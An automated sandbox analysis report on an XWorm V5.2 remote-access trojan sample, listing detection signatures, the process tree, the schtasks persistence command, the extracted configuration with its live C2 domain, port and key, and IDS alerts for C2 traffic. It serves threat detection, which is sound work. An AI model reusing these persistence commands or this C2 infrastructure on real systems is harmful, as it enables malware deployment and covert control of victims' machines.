Windows Analysis Report
fresh_shrunk.exe

Overview

General Information

Sample name: fresh_shrunk.exe
Analysis ID: 1429324
MD5: 745a24a4347a0bb2b9c5e1ba5b2dadeb
SHA1: e89eecdf3bd5a8f34b8933986567cfda2401e17a
SHA256: ad5c027ed298920cd09cefbfcb08bff9b5b55ee1f411ba59f6d1e77677e3bb5c
Tags: exe

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Uses dynamic DNS services
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to launch a process as a different user
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • fresh_shrunk.exe (PID: 6860 cmdline: "C:\Users\user\Desktop\fresh_shrunk.exe" MD5: 745A24A4347A0BB2B9C5E1BA5B2DADEB)
    • RegAsm.exe (PID: 6948 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • cmd.exe (PID: 6972 cmdline: "cmd.exe" /C mkdir "C:\Users\user\AppData\Local\Temp\bddddsx" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6160 cmdline: "cmd.exe" /C schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe'" /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 3452 cmdline: schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe'" /f MD5: 48C2FE20575769DE916F48EF0676A965)
    • cmd.exe (PID: 2196 cmdline: "cmd.exe" /C copy "C:\Users\user\Desktop\fresh_shrunk.exe" "C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • bddddsx.exe (PID: 3192 cmdline: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe MD5: 745A24A4347A0BB2B9C5E1BA5B2DADEB)
    • RegAsm.exe (PID: 6616 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • cmd.exe (PID: 7104 cmdline: "cmd.exe" /C mkdir "C:\Users\user\AppData\Local\Temp\bddddsx" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7088 cmdline: "cmd.exe" /C schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe'" /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 6612 cmdline: schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe'" /f MD5: 48C2FE20575769DE916F48EF0676A965)
    • cmd.exe (PID: 2316 cmdline: "cmd.exe" /C copy "C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe" "C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

{"C2 url": ["vbdsg.duckdns.org"], "Port": "8896", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2"}

Memory Dumps

Source: 0000000A.00000002.1720132463.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Rule: JoeSecurity_XWorm | Description: Yara detected XWorm | Author: Joe Security
Source: 0000000A.00000002.1720132463.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Rule: MALWARE_Win_AsyncRAT | Description: Detects AsyncRAT | Author: ditekSHen
  • 0x7870:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x790d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x7a22:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x751e:$cnc4: POST / HTTP/1.1
Source: 00000000.00000002.1677750236.0000000002861000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_XWorm | Description: Yara detected XWorm | Author: Joe Security
Source: 00000000.00000002.1677750236.0000000002861000.00000004.00000800.00020000.00000000.sdmp | Rule: MALWARE_Win_AsyncRAT | Description: Detects AsyncRAT | Author: ditekSHen
  • 0x1d2ac:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x26fec:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x4d24c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x1d349:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x27089:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x4d2e9:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x1d45e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x2719e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x4d3fe:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x1cf5a:$cnc4: POST / HTTP/1.1
  • 0x26c9a:$cnc4: POST / HTTP/1.1
  • 0x4cefa:$cnc4: POST / HTTP/1.1
Source: 00000009.00000002.1695358036.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_XWorm | Description: Yara detected XWorm | Author: Joe Security
(6 further memory dump entries not shown in this extract)

Unpacked PEs

Source: 10.2.RegAsm.exe.400000.0.unpack | Rule: JoeSecurity_XWorm | Description: Yara detected XWorm | Author: Joe Security
Source: 10.2.RegAsm.exe.400000.0.unpack | Rule: MALWARE_Win_AsyncRAT | Description: Detects AsyncRAT | Author: ditekSHen
  • 0x7a70:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x7b0d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x7c22:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x771e:$cnc4: POST / HTTP/1.1
Source: 0.2.fresh_shrunk.exe.287683c.0.unpack | Rule: JoeSecurity_XWorm | Description: Yara detected XWorm | Author: Joe Security
Source: 0.2.fresh_shrunk.exe.287683c.0.unpack | Rule: MALWARE_Win_AsyncRAT | Description: Detects AsyncRAT | Author: ditekSHen
  • 0x5c70:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x5d0d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x5e22:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x591e:$cnc4: POST / HTTP/1.1
Source: 9.2.bddddsx.exe.2fd0628.0.unpack | Rule: JoeSecurity_XWorm | Description: Yara detected XWorm | Author: Joe Security
(17 further unpacked PE entries not shown in this extract)

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe'" /f, CommandLine: schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe'" /f, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "cmd.exe" /C schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe'" /f, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6160, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe'" /f, ProcessId: 3452, ProcessName: schtasks.exe
Source: Process started | Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community | Data: Command: "cmd.exe" /C mkdir "C:\Users\user\AppData\Local\Temp\bddddsx", CommandLine: "cmd.exe" /C mkdir "C:\Users\user\AppData\Local\Temp\bddddsx", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\fresh_shrunk.exe", ParentImage: C:\Users\user\Desktop\fresh_shrunk.exe, ParentProcessId: 6860, ParentProcessName: fresh_shrunk.exe, ProcessCommandLine: "cmd.exe" /C mkdir "C:\Users\user\AppData\Local\Temp\bddddsx", ProcessId: 6972, ProcessName: cmd.exe

Snort IDS Alerts

Timestamp: 04/21/24-23:26:43.756948 | SID: 2852874 | Source Port: 8896 | Destination Port: 49730 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 04/21/24-23:23:14.441038 | SID: 2855924 | Source Port: 49730 | Destination Port: 8896 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 04/21/24-23:27:02.685039 | SID: 2852870 | Source Port: 8896 | Destination Port: 49730 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 04/21/24-23:27:02.686118 | SID: 2852923 | Source Port: 49730 | Destination Port: 8896 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 04/21/24-23:26:01.631776 | SID: 2853193 | Source Port: 49730 | Destination Port: 8896 | Protocol: TCP | Classtype: A Network Trojan was detected

              AV Detection

Source: 00000000.00000002.1677750236.0000000002861000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Xworm {"C2 url": ["vbdsg.duckdns.org"], "Port": "8896", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2"}
Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe | ReversingLabs: Detection: 55%
Source: fresh_shrunk.exe | ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe | Joe Sandbox ML: detected
Source: fresh_shrunk.exe | Joe Sandbox ML: detected
Source: 9.2.bddddsx.exe.2fd0628.0.raw.unpack | String decryptor: vbdsg.duckdns.org
Source: 9.2.bddddsx.exe.2fd0628.0.raw.unpack | String decryptor: 8896
Source: 9.2.bddddsx.exe.2fd0628.0.raw.unpack | String decryptor: <123456789>
Source: 9.2.bddddsx.exe.2fd0628.0.raw.unpack | String decryptor: <Xwormmm>
Source: 9.2.bddddsx.exe.2fd0628.0.raw.unpack | String decryptor: XWorm V5.2
Source: 9.2.bddddsx.exe.2fd0628.0.raw.unpack | String decryptor: USB.exe
Source: fresh_shrunk.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: fresh_shrunk.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Networking

Source: Traffic | Snort IDS: 2852874 ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 57.128.155.22:8896 -> 192.168.2.4:49730
Source: Traffic | Snort IDS: 2852870 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes 57.128.155.22:8896 -> 192.168.2.4:49730
Source: Traffic | Snort IDS: 2855924 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.4:49730 -> 57.128.155.22:8896
Source: Traffic | Snort IDS: 2852923 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) 192.168.2.4:49730 -> 57.128.155.22:8896
Source: Traffic | Snort IDS: 2853193 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.4:49730 -> 57.128.155.22:8896
Source: Malware configuration extractor | URLs: vbdsg.duckdns.org
Source: unknown | DNS query: name: vbdsg.duckdns.org
Source: Yara match | File source: 0.2.fresh_shrunk.exe.288057c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.bddddsx.exe.2fd0628.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.fresh_shrunk.exe.287683c.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.bddddsx.exe.2fc68e8.1.raw.unpack, type: UNPACKEDPE
Source: global traffic | TCP traffic: 192.168.2.4:49730 -> 57.128.155.22:8896
Source: Joe Sandbox View | IP Address: 57.128.155.22
Source: Joe Sandbox View | ASN Name: ATGS-MMD-ASUS
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | DNS traffic detected: queries for: vbdsg.duckdns.org
Source: RegAsm.exe, 00000001.00000002.4136838151.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

              Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 0.2.fresh_shrunk.exe.287683c.0.raw.unpack, XLogger.cs | .Net Code: KeyboardLayout
Source: 0.2.fresh_shrunk.exe.288057c.1.raw.unpack, XLogger.cs | .Net Code: KeyboardLayout
Source: 9.2.bddddsx.exe.2fd0628.0.raw.unpack, XLogger.cs | .Net Code: KeyboardLayout
Source: 9.2.bddddsx.exe.2fc68e8.1.raw.unpack, XLogger.cs | .Net Code: KeyboardLayout

              System Summary

Source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.fresh_shrunk.exe.287683c.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 9.2.bddddsx.exe.2fd0628.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.fresh_shrunk.exe.288057c.1.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 9.2.bddddsx.exe.2fc68e8.1.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.fresh_shrunk.exe.288057c.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 9.2.bddddsx.exe.2fd0628.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.fresh_shrunk.exe.287683c.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 9.2.bddddsx.exe.2fc68e8.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000A.00000002.1720132463.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.1677750236.0000000002861000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000009.00000002.1695358036.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\fresh_shrunk.exe | Code function: 0_2_02718030 CreateProcessAsUserA
Source: C:\Users\user\Desktop\fresh_shrunk.exe | Code function: 0_2_027150D0
Source: C:\Users\user\Desktop\fresh_shrunk.exe | Code function: 0_2_027159A0
Source: C:\Users\user\Desktop\fresh_shrunk.exe | Code function: 0_2_02714D88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 1_2_02D10ED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 1_2_02D1D4DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 1_2_02DDB678
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 1_2_02DDBF48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 1_2_02DDE638
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 1_2_02DD0738
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 1_2_02DDB330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 1_2_02DD71A9
Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe | Code function: 9_2_015159A0
Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe | Code function: 9_2_015150D0
Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe | Code function: 9_2_01514D88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 10_2_02E50EC0
Source: fresh_shrunk.exe, 00000000.00000002.1677750236.0000000002861000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameXClient5.2spread.exe4 vs fresh_shrunk.exe
Source: fresh_shrunk.exe, 00000000.00000000.1669872052.00000000005D6000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameBootstrapper.exeB vs fresh_shrunk.exe
Source: fresh_shrunk.exe, 00000000.00000002.1676771101.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs fresh_shrunk.exe
Source: fresh_shrunk.exe | Binary or memory string: OriginalFilenameBootstrapper.exeB vs fresh_shrunk.exe
Source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.fresh_shrunk.exe.287683c.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 9.2.bddddsx.exe.2fd0628.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.fresh_shrunk.exe.288057c.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 9.2.bddddsx.exe.2fc68e8.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.fresh_shrunk.exe.288057c.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 9.2.bddddsx.exe.2fd0628.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.fresh_shrunk.exe.287683c.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 9.2.bddddsx.exe.2fc68e8.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000A.00000002.1720132463.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.1677750236.0000000002861000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000009.00000002.1695358036.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: fresh_shrunk.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: bddddsx.exe.7.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.fresh_shrunk.exe.287683c.0.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.fresh_shrunk.exe.287683c.0.raw.unpack, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.fresh_shrunk.exe.288057c.1.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.fresh_shrunk.exe.288057c.1.raw.unpack, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.bddddsx.exe.2fd0628.0.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.bddddsx.exe.2fd0628.0.raw.unpack, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.bddddsx.exe.2fc68e8.1.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.fresh_shrunk.exe.287683c.0.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.fresh_shrunk.exe.287683c.0.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 9.2.bddddsx.exe.2fc68e8.1.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 9.2.bddddsx.exe.2fc68e8.1.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.fresh_shrunk.exe.288057c.1.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.fresh_shrunk.exe.288057c.1.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 9.2.bddddsx.exe.2fd0628.0.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 9.2.bddddsx.exe.2fd0628.0.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@28/5@1/1
Source: C:\Users\user\Desktop\fresh_shrunk.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\fresh_shrunk.exe.log
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Mutant created: NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Mutant created: \Sessions\1\BaseNamedObjects\GgQUWuMVOC7DAikW
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6992:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5076:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7128:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6204:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7084:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7160:120:WilError_03
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\bddddsx
Source: fresh_shrunk.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\fresh_shrunk.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\fresh_shrunk.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: unknownProcess created: C:\Users\user\Desktop\fresh_shrunk.exe "C:\Users\user\Desktop\fresh_shrunk.exe"
              Source: C:\Users\user\Desktop\fresh_shrunk.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              Source: C:\Users\user\Desktop\fresh_shrunk.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C mkdir "C:\Users\user\AppData\Local\Temp\bddddsx"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\fresh_shrunk.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe'" /f
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe'" /f
              Source: C:\Users\user\Desktop\fresh_shrunk.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C copy "C:\Users\user\Desktop\fresh_shrunk.exe" "C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe"
